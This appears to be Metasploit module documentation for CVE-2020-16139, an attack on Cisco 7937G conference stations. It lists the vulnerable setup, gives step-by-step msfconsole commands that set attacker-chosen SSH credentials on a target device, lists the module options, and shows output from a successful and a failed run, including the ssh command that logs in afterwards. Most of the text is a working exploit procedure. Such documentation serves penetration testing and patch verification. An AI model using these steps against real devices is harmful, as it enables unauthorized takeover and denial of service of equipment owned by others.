debifrank
1.5 KiB
1.5 KiB
Vulnerable Application
- Obtain a Cisco 7937G Conference Station.
- Enable Web Access and SSH Access on the device.
- It has been observed that based on the firmware available from Cisco, all version are likely vulnerable.
Verification Steps
- Start msfconsole
- Do:
use auxiliary/dos/cisco/CVE-2020-16139 - Do:
set RHOSTS 192.168.1.10 - Do:
set USER test - Do:
set PASS test - Do:
run - The conference station's SSH service should now be configured with the supplied USER:PASS.
Options
- PASS (required) - Desired password
- RHOSTS (required) - Target addres
- THREADS (default 1, required) - The number of concurrent threads (max one per host)
- TIMEOUT (default 5, required) - Timeout in seconds before aborting
- USER (required) - Desired username
Scenarios
Successful Scenario
[*] Running for 192.168.110.209...
[*] 192.168.110.209 - Attempting to set SSH credentials.
[*] 192.168.110.209 - SSH attack finished!
[*] 192.168.110.209 - Try to login using the supplied credentials test:test
[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
Unsuccessful Scenario
[*] Running for 192.168.110.209...
[*] 192.168.110.209 - Attempting to set SSH credentials.
[-] 192.168.110.209 - Device doesn't appear to be functioning or web access is not enabled.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed